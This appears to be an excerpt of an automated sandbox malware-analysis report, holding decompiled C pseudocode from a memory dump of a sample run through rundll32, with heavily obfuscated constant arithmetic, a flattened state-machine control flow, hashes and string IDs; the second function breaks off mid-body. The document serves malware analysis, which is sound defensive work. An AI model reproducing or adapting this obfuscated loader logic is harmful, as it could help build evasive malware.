                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00355CF9() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed short* _t381;
                                                                                                                      				signed int _t393;
                                                                                                                      				signed int* _t395;
                                                                                                                      				signed int _t397;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int* _t428;
                                                                                                                      				void* _t429;
                                                                                                                      				signed short* _t435;
                                                                                                                      				signed int* _t436;
                                                                                                                      
                                                                                                                      				_t436 =  &_v1720;
                                                                                                                      				_v1644 = 0xf4f2e5;
                                                                                                                      				_v1644 = _v1644 << 6;
                                                                                                                      				_t397 = 0x4a;
                                                                                                                      				_v1644 = _v1644 / _t397;
                                                                                                                      				_v1644 = _v1644 ^ 0x00d3d8d4;
                                                                                                                      				_t395 = 0;
                                                                                                                      				_v1660 = 0x8afd01;
                                                                                                                      				_t429 = 0xc405385;
                                                                                                                      				_v1660 = _v1660 | 0xf6dee043;
                                                                                                                      				_v1660 = _v1660 ^ 0x10b315be;
                                                                                                                      				_t398 = 0x45;
                                                                                                                      				_v1660 = _v1660 / _t398;
                                                                                                                      				_v1660 = _v1660 ^ 0x035da190;
                                                                                                                      				_v1692 = 0xc25321;
                                                                                                                      				_v1692 = _v1692 | 0x3e4ae4fc;
                                                                                                                      				_t399 = 0x12;
                                                                                                                      				_v1692 = _v1692 * 0x47;
                                                                                                                      				_v1692 = _v1692 ^ 0x6159278c;
                                                                                                                      				_v1692 = _v1692 ^ 0x0b15fa01;
                                                                                                                      				_v1572 = 0xf82306;
                                                                                                                      				_v1572 = _v1572 | 0xe3d21ea1;
                                                                                                                      				_v1572 = _v1572 ^ 0xe3f9e5ad;
                                                                                                                      				_v1676 = 0x48d4cb;
                                                                                                                      				_v1676 = _v1676 << 4;
                                                                                                                      				_v1676 = _v1676 + 0xffff2f85;
                                                                                                                      				_v1676 = _v1676 + 0x9649;
                                                                                                                      				_v1676 = _v1676 ^ 0x048c097a;
                                                                                                                      				_v1584 = 0x8f76c2;
                                                                                                                      				_v1584 = _v1584 * 0x1d;
                                                                                                                      				_v1584 = _v1584 ^ 0x10457475;
                                                                                                                      				_v1596 = 0xadf885;
                                                                                                                      				_v1596 = _v1596 ^ 0xa065608b;
                                                                                                                      				_v1596 = _v1596 ^ 0xa0c2245b;
                                                                                                                      				_v1684 = 0xeb1e45;
                                                                                                                      				_v1684 = _v1684 + 0x7cda;
                                                                                                                      				_v1684 = _v1684 / _t399;
                                                                                                                      				_v1684 = _v1684 + 0xffffa266;
                                                                                                                      				_v1684 = _v1684 ^ 0x0000adef;
                                                                                                                      				_v1632 = 0x65fdd9;
                                                                                                                      				_v1632 = _v1632 + 0xb49;
                                                                                                                      				_v1632 = _v1632 + 0xfffffa9d;
                                                                                                                      				_v1632 = _v1632 ^ 0x00600454;
                                                                                                                      				_v1716 = 0x9184ac;
                                                                                                                      				_v1716 = _v1716 + 0xffff0d2e;
                                                                                                                      				_v1716 = _v1716 | 0x6897691f;
                                                                                                                      				_v1716 = _v1716 ^ 0x2cb5e262;
                                                                                                                      				_v1716 = _v1716 ^ 0x442095be;
                                                                                                                      				_v1576 = 0x53941d;
                                                                                                                      				_v1576 = _v1576 >> 2;
                                                                                                                      				_v1576 = _v1576 ^ 0x001525d4;
                                                                                                                      				_v1640 = 0xd435ce;
                                                                                                                      				_v1640 = _v1640 + 0xffff1394;
                                                                                                                      				_v1640 = _v1640 + 0xffff8dc5;
                                                                                                                      				_v1640 = _v1640 ^ 0x00d594ec;
                                                                                                                      				_v1708 = 0x173594;
                                                                                                                      				_v1708 = _v1708 ^ 0xe44a87fe;
                                                                                                                      				_v1708 = _v1708 << 7;
                                                                                                                      				_v1708 = _v1708 + 0xee7d;
                                                                                                                      				_v1708 = _v1708 ^ 0x2ed8d8cc;
                                                                                                                      				_v1700 = 0x94f2ae;
                                                                                                                      				_v1700 = _v1700 << 3;
                                                                                                                      				_v1700 = _v1700 << 6;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x66d58e50;
                                                                                                                      				_v1604 = 0xd84545;
                                                                                                                      				_v1604 = _v1604 | 0x98cc5948;
                                                                                                                      				_v1604 = _v1604 ^ 0x98d8436e;
                                                                                                                      				_v1668 = 0xea4a2f;
                                                                                                                      				_v1668 = _v1668 + 0xf7bd;
                                                                                                                      				_v1668 = _v1668 >> 7;
                                                                                                                      				_v1668 = _v1668 ^ 0xf693418b;
                                                                                                                      				_v1668 = _v1668 ^ 0xf6966bd3;
                                                                                                                      				_v1580 = 0xa2c8e;
                                                                                                                      				_v1580 = _v1580 + 0x2944;
                                                                                                                      				_v1580 = _v1580 ^ 0x00011cb1;
                                                                                                                      				_v1720 = 0x34ce8d;
                                                                                                                      				_v1720 = _v1720 | 0xf5ffffea;
                                                                                                                      				_v1720 = _v1720 >> 9;
                                                                                                                      				_v1720 = _v1720 ^ 0x00732654;
                                                                                                                      				_v1564 = 0x8a9f58;
                                                                                                                      				_v1564 = _v1564 + 0x7c05;
                                                                                                                      				_v1564 = _v1564 ^ 0x008f283e;
                                                                                                                      				_v1588 = 0xa4f562;
                                                                                                                      				_v1588 = _v1588 ^ 0x7b7d16a6;
                                                                                                                      				_v1588 = _v1588 ^ 0x7bd14885;
                                                                                                                      				_v1704 = 0xee28fd;
                                                                                                                      				_v1704 = _v1704 + 0xffffe5b2;
                                                                                                                      				_v1704 = _v1704 + 0xffff824b;
                                                                                                                      				_v1704 = _v1704 + 0x581e;
                                                                                                                      				_v1704 = _v1704 ^ 0x00e0f0ab;
                                                                                                                      				_v1712 = 0x91da58;
                                                                                                                      				_v1712 = _v1712 << 3;
                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                      				_v1712 = _v1712 ^ 0x485191fe;
                                                                                                                      				_v1712 = _v1712 ^ 0x920a86f0;
                                                                                                                      				_v1624 = 0xf1deea;
                                                                                                                      				_t400 = 3;
                                                                                                                      				_v1624 = _v1624 / _t400;
                                                                                                                      				_t401 = 0x38;
                                                                                                                      				_v1624 = _v1624 * 0x4f;
                                                                                                                      				_v1624 = _v1624 ^ 0x18ea6ffc;
                                                                                                                      				_v1680 = 0x898c63;
                                                                                                                      				_v1680 = _v1680 * 0x6a;
                                                                                                                      				_v1680 = _v1680 * 0x38;
                                                                                                                      				_v1680 = _v1680 | 0xa82efbb3;
                                                                                                                      				_v1680 = _v1680 ^ 0xfd6ff7e4;
                                                                                                                      				_v1688 = 0xae251e;
                                                                                                                      				_v1688 = _v1688 << 3;
                                                                                                                      				_v1688 = _v1688 >> 0xf;
                                                                                                                      				_v1688 = _v1688 + 0xb719;
                                                                                                                      				_v1688 = _v1688 ^ 0x000aff47;
                                                                                                                      				_v1696 = 0x40e656;
                                                                                                                      				_v1696 = _v1696 | 0x21fda4e6;
                                                                                                                      				_v1696 = _v1696 + 0xca7;
                                                                                                                      				_v1696 = _v1696 << 0xa;
                                                                                                                      				_v1696 = _v1696 ^ 0xf7c0cc6c;
                                                                                                                      				_v1652 = 0x8f24c5;
                                                                                                                      				_v1652 = _v1652 << 0xb;
                                                                                                                      				_v1652 = _v1652 ^ 0x5fc65761;
                                                                                                                      				_v1652 = _v1652 ^ 0x26eed855;
                                                                                                                      				_v1600 = 0xeb50f4;
                                                                                                                      				_v1600 = _v1600 | 0xe5f9ced2;
                                                                                                                      				_v1600 = _v1600 ^ 0xe5f6f1e5;
                                                                                                                      				_v1672 = 0x2ac6e7;
                                                                                                                      				_v1672 = _v1672 / _t401;
                                                                                                                      				_v1672 = _v1672 + 0xffffde53;
                                                                                                                      				_v1672 = _v1672 + 0xffff94e0;
                                                                                                                      				_v1672 = _v1672 ^ 0x000ac548;
                                                                                                                      				_v1648 = 0x7ee323;
                                                                                                                      				_v1648 = _v1648 ^ 0xc4404dab;
                                                                                                                      				_v1648 = _v1648 << 2;
                                                                                                                      				_v1648 = _v1648 ^ 0x10f162dd;
                                                                                                                      				_v1568 = 0xe6f77a;
                                                                                                                      				_v1568 = _v1568 | 0x9ec6220d;
                                                                                                                      				_v1568 = _v1568 ^ 0x9ee5ede4;
                                                                                                                      				_v1616 = 0x905f8c;
                                                                                                                      				_v1616 = _v1616 + 0xffff5c7c;
                                                                                                                      				_v1616 = _v1616 >> 2;
                                                                                                                      				_v1616 = _v1616 ^ 0x0024325f;
                                                                                                                      				_v1592 = 0xde4b6;
                                                                                                                      				_v1592 = _v1592 * 0x3f;
                                                                                                                      				_v1592 = _v1592 ^ 0x03679ec9;
                                                                                                                      				_v1664 = 0xe0cee4;
                                                                                                                      				_v1664 = _v1664 >> 2;
                                                                                                                      				_v1664 = _v1664 * 0x13;
                                                                                                                      				_v1664 = _v1664 * 0x71;
                                                                                                                      				_v1664 = _v1664 ^ 0xd75e35a6;
                                                                                                                      				_v1636 = 0x97f252;
                                                                                                                      				_v1636 = _v1636 | 0xcb237ae2;
                                                                                                                      				_v1636 = _v1636 << 0xf;
                                                                                                                      				_v1636 = _v1636 ^ 0xfd7df459;
                                                                                                                      				_v1656 = 0xc6c2a7;
                                                                                                                      				_v1656 = _v1656 + 0x66f2;
                                                                                                                      				_v1656 = _v1656 >> 0x10;
                                                                                                                      				_v1656 = _v1656 | 0xc8135773;
                                                                                                                      				_v1656 = _v1656 ^ 0xc81a6fdc;
                                                                                                                      				_v1608 = 0xd95490;
                                                                                                                      				_v1608 = _v1608 + 0xffff3702;
                                                                                                                      				_v1608 = _v1608 ^ 0x00d9a4ac;
                                                                                                                      				_v1612 = 0x2487c2;
                                                                                                                      				_t435 = _v1608;
                                                                                                                      				_v1612 = _v1612 * 0x77;
                                                                                                                      				_v1612 = _v1612 << 4;
                                                                                                                      				_v1612 = _v1612 ^ 0x0fb1a599;
                                                                                                                      				_v1620 = 0xa1030c;
                                                                                                                      				_v1620 = _v1620 >> 3;
                                                                                                                      				_v1620 = _v1620 << 0x10;
                                                                                                                      				_v1620 = _v1620 ^ 0x20685173;
                                                                                                                      				_v1628 = 0xb9794c;
                                                                                                                      				_v1628 = _v1628 >> 0xa;
                                                                                                                      				_v1628 = _v1628 >> 4;
                                                                                                                      				_v1628 = _v1628 ^ 0x0003794a;
                                                                                                                      				while(_t429 != 0x35deb36) {
                                                                                                                      					if(_t429 == 0x3b58d4d) {
                                                                                                                      						_push(_v1628);
                                                                                                                      						_push(_v1620);
                                                                                                                      						_push(_v1612);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t401);
                                                                                                                      						_push(_t395);
                                                                                                                      						E00349700(_t435, _v1656, __eflags);
                                                                                                                      						_t395 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						L23:
                                                                                                                      						return _t395;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x7ac99d0) {
                                                                                                                      						_t381 = _t435;
                                                                                                                      						__eflags =  *_t435 - _t395;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L18:
                                                                                                                      							_t429 = 0xe3616dc;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L11:
                                                                                                                      							__eflags =  *_t381 - 0x2c;
                                                                                                                      							if( *_t381 != 0x2c) {
                                                                                                                      								goto L17;
                                                                                                                      							}
                                                                                                                      							_t428 =  &_v1560;
                                                                                                                      							while(1) {
                                                                                                                      								_t381 =  &(_t381[1]);
                                                                                                                      								_t407 =  *_t381 & 0x0000ffff;
                                                                                                                      								__eflags = _t407;
                                                                                                                      								if(_t407 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t407 - 0x20;
                                                                                                                      								if(_t407 == 0x20) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								 *_t428 = _t407;
                                                                                                                      								_t428 =  &(_t428[0]);
                                                                                                                      								__eflags = _t428;
                                                                                                                      							}
                                                                                                                      							_t401 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      							 *_t428 = 0;
                                                                                                                      							L17:
                                                                                                                      							_t381 =  &(_t381[1]);
                                                                                                                      							__eflags =  *_t381 - _t395;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0x94e99a1) {
                                                                                                                      						_push(_t401);
                                                                                                                      						E0034EA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
                                                                                                                      						E003612A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
                                                                                                                      						_push(_v1652);
                                                                                                                      						_push(_v1696);
                                                                                                                      						_push(0x3411dc);
                                                                                                                      						E0034E7CE(E0034AB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
                                                                                                                      						_t401 = _v1592;
                                                                                                                      						E0034AE03(_t401, _v1664, _v1636, _t385);
                                                                                                                      						_t436 =  &(_t436[0x17]);
                                                                                                                      						_t429 = 0x3b58d4d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0xc405385) {
                                                                                                                      						_t401 = 0x208;
                                                                                                                      						E00361310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
                                                                                                                      						_t436 =  &(_t436[4]);
                                                                                                                      						_t429 = 0x35deb36;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t445 = _t429 - 0xe3616dc;
                                                                                                                      					if(_t429 == 0xe3616dc) {
                                                                                                                      						_push(_v1716);
                                                                                                                      						_push(_v1632);
                                                                                                                      						_push(0x34115c);
                                                                                                                      						_t393 = E0035FC96(_v1576, _v1640, E0034AB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
                                                                                                                      						asm("sbb edi, edi");
                                                                                                                      						_t401 = _v1700;
                                                                                                                      						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
                                                                                                                      						E0034AE03(_t401, _v1604, _v1668, _t391);
                                                                                                                      						_t436 =  &(_t436[8]);
                                                                                                                      					}
                                                                                                                      					L20:
                                                                                                                      					if(_t429 != 0x74a6920) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      				}
                                                                                                                      				_t435 = E0035E35A();
                                                                                                                      				_t429 = 0x7ac99d0;
                                                                                                                      				goto L20;
                                                                                                                      			}

                                                                                                                      0x00356261
                                                                                                                      0x00356266
                                                                                                                      0x0035626e
                                                                                                                      0x00356276
                                                                                                                      0x0035627b
                                                                                                                      0x00356280
                                                                                                                      0x00356288
                                                                                                                      0x0035629a
                                                                                                                      0x0035648d
                                                                                                                      0x00356491
                                                                                                                      0x00356495
                                                                                                                      0x0035649c
                                                                                                                      0x0035649d
                                                                                                                      0x0035649e
                                                                                                                      0x003564a9
                                                                                                                      0x003564aa
                                                                                                                      0x003564ad
                                                                                                                      0x003564b7
                                                                                                                      0x003564b7
                                                                                                                      0x003564bb
                                                                                                                      0x003564c4
                                                                                                                      0x003564c4
                                                                                                                      0x003562a6
                                                                                                                      0x00356427
                                                                                                                      0x00356429
                                                                                                                      0x0035642d
                                                                                                                      0x00356462
                                                                                                                      0x00356462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035642f
                                                                                                                      0x0035642f
                                                                                                                      0x0035642f
                                                                                                                      0x00356433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00356435
                                                                                                                      0x0035644a
                                                                                                                      0x0035644a
                                                                                                                      0x0035644d
                                                                                                                      0x00356450
                                                                                                                      0x00356453
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035643e
                                                                                                                      0x00356442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00356444
                                                                                                                      0x00356447
                                                                                                                      0x00356447
                                                                                                                      0x00356447
                                                                                                                      0x00356455
                                                                                                                      0x00356455
                                                                                                                      0x00356457
                                                                                                                      0x0035645a
                                                                                                                      0x0035645a
                                                                                                                      0x0035645d
                                                                                                                      0x0035645d
                                                                                                                      0x00000000
                                                                                                                      0x0035642f
                                                                                                                      0x003562b2
                                                                                                                      0x00356368
                                                                                                                      0x0035638e
                                                                                                                      0x003563aa
                                                                                                                      0x003563af
                                                                                                                      0x003563b3
                                                                                                                      0x003563bf
                                                                                                                      0x003563fd
                                                                                                                      0x0035640e
                                                                                                                      0x00356415
                                                                                                                      0x0035641a
                                                                                                                      0x0035641d
                                                                                                                      0x00000000
                                                                                                                      0x0035641d
                                                                                                                      0x003562be
                                                                                                                      0x00356342
                                                                                                                      0x00356356
                                                                                                                      0x0035635b
                                                                                                                      0x0035635e
                                                                                                                      0x00000000
                                                                                                                      0x0035635e
                                                                                                                      0x003562c0
                                                                                                                      0x003562c6
                                                                                                                      0x003562cc
                                                                                                                      0x003562d0
                                                                                                                      0x003562df
                                                                                                                      0x00356303
                                                                                                                      0x00356318
                                                                                                                      0x0035631a
                                                                                                                      0x00356324
                                                                                                                      0x0035632a
                                                                                                                      0x0035632f
                                                                                                                      0x0035632f
                                                                                                                      0x0035647f
                                                                                                                      0x00356485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035648b
                                                                                                                      0x00356478
                                                                                                                      0x0035647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: cf82310119f8b2bf476a157fa53fb4468ca9c55399cc60bb09a1738523340cca
                                                                                                                      • Instruction ID: a7d928f06d06067a505609a1fa76122de97912877a933192b035b88864af272c
                                                                                                                      • Opcode Fuzzy Hash: cf82310119f8b2bf476a157fa53fb4468ca9c55399cc60bb09a1738523340cca
                                                                                                                      • Instruction Fuzzy Hash: D00214B25083809FD3A5CF65C58AA4BBBE1FBC5748F50891DF5DA8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 280 349700-3499cc call 34cf25 call 361310 call 35679c 286 3499d1-3499d6 280->286 287 349a15 286->287 288 3499d8-3499da 286->288 289 349a17-349a1d 287->289 290 3499dc-3499e2 288->290 291 3499e8-349a13 call 354dad * 2 288->291 292 3499e3-3499e6 290->292 291->292 292->289
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00349700(WCHAR* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t207;
                                                                                                                      				void* _t231;
                                                                                                                      				void* _t232;
                                                                                                                      				signed int _t237;
                                                                                                                      				signed int _t238;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				void* _t243;
                                                                                                                      				intOrPtr _t265;
                                                                                                                      				WCHAR* _t268;
                                                                                                                      				void* _t271;
                                                                                                                      				void* _t272;
                                                                                                                      
                                                                                                                      				_t271 = _t272 - 0x58;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x7c)));
                                                                                                                      				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
                                                                                                                      				_t268 = __ecx;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x74)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x70)));
                                                                                                                      				_push(_t265);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x68)));
                                                                                                                      				_push(0);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x60)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t207);
                                                                                                                      				 *(_t271 + 0x40) = 0x9c1626;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
                                                                                                                      				 *(_t271 + 0x50) = 0x2d866;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
                                                                                                                      				 *(_t271 + 0x1c) = 0xb11a6d;
                                                                                                                      				_t237 = 0x61;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
                                                                                                                      				 *(_t271 + 0x28) = 0x82663;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
                                                                                                                      				 *(_t271 + 0xc) = 0xaf113;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
                                                                                                                      				 *(_t271 + 0x30) = 0x440ee2;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
                                                                                                                      				_t238 = 0x3a;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
                                                                                                                      				 *(_t271 + 8) = 0x67057e;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
                                                                                                                      				 *(_t271 + 0x38) = 0x1c9970;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
                                                                                                                      				 *(_t271 + 0x54) = 0x9de9b7;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
                                                                                                                      				 *(_t271 + 0x48) = 0xcb1eea;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
                                                                                                                      				 *(_t271 + 0x20) = 0xb0d713;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
                                                                                                                      				 *(_t271 + 0x18) = 0xfc2615;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
                                                                                                                      				 *(_t271 + 0x4c) = 0x55d93;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
                                                                                                                      				 *(_t271 + 0x24) = 0xa7d31;
                                                                                                                      				_t239 = 0x67;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
                                                                                                                      				_t240 = 0x64;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
                                                                                                                      				 *(_t271 + 0x14) = 0x947781;
                                                                                                                      				_t241 = 0x11;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
                                                                                                                      				 *(_t271 + 0x2c) = 0x75c872;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
                                                                                                                      				_t242 = 0x74;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
                                                                                                                      				 *(_t271 + 0x10) = 0x81f543;
                                                                                                                      				_t149 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
                                                                                                                      				 *(_t271 + 0x3c) = 0x7405f8;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
                                                                                                                      				 *(_t271 + 0x34) = 0x5a2607;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
                                                                                                                      				 *(_t271 + 0x44) = 0xea1272;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
                                                                                                                      				_push( *(_t271 + 0x28));
                                                                                                                      				_push( *(_t271 + 0x1c));
